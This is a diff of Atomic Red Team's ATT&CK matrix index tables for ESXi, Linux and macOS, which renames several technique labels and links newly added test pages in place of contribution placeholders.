   - Atomic Test #2: Activate Guest Account [windows]

atomics/Indexes/Matrices/esxi-matrix.md

@@ -2,7 +2,7 @@
 | initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
 |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job: Cron [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerading: Match Legitimate Name or Location [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Network Configuration Discovery: Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services: SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Staged: Local Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encoding: Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ESXi Administration Command [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job: Cron [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job: Cron [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery: Local Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Webhook [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ESXi Administration Command [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job: Cron [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job: Cron [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery: Local Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Webhook [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution: Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Indicator Removal on Host: Clear Command History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Information Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Credential Stuffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Virtual Machine Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Access Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: Bash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create Account: Local Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | System Network Configuration Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  | Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |

atomics/Indexes/Matrices/linux-matrix.md

@@ -3,14 +3,14 @@
 |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
 | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | Remote Services:VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [System Network Configuration Discovery: Internet Connection Discovery](../../T1016.001/T1016.001.md) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Exfiltration Over Webhook [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Phishing: Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services: SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Phishing: Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services: SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Dynamic Resolution: Domain Generation Algorithms](../../T1568.002/T1568.002.md) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | [Device Driver Discovery](../../T1652/T1652.md) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Domain Account](../../T1087.002/T1087.002.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Audio Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Systemctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Service Stop](../../T1489/T1489.md) |
+| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Services: Systemctl](../../T1569.003/T1569.003.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [Content Injection](../../T1659/T1659.md) | Input Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Service Stop](../../T1489/T1489.md) |
 | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | [System Service Discovery](../../T1007/T1007.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Rootkit](../../T1014/T1014.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Databases [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Rootkit](../../T1014/T1014.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Databases [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Content Injection](../../T1659/T1659.md) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component: Transport Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ccache Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Clipboard Data](../../T1115/T1115.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Protocol Tunneling](../../T1572/T1572.md) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | [Browser Extensions](../../T1176/T1176.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) |  | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |

atomics/Indexes/Matrices/macos-matrix.md

@@ -3,14 +3,14 @@
 |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
 | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | [Remote Services:VNC](../../T1021.005/T1021.005.md) | [Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
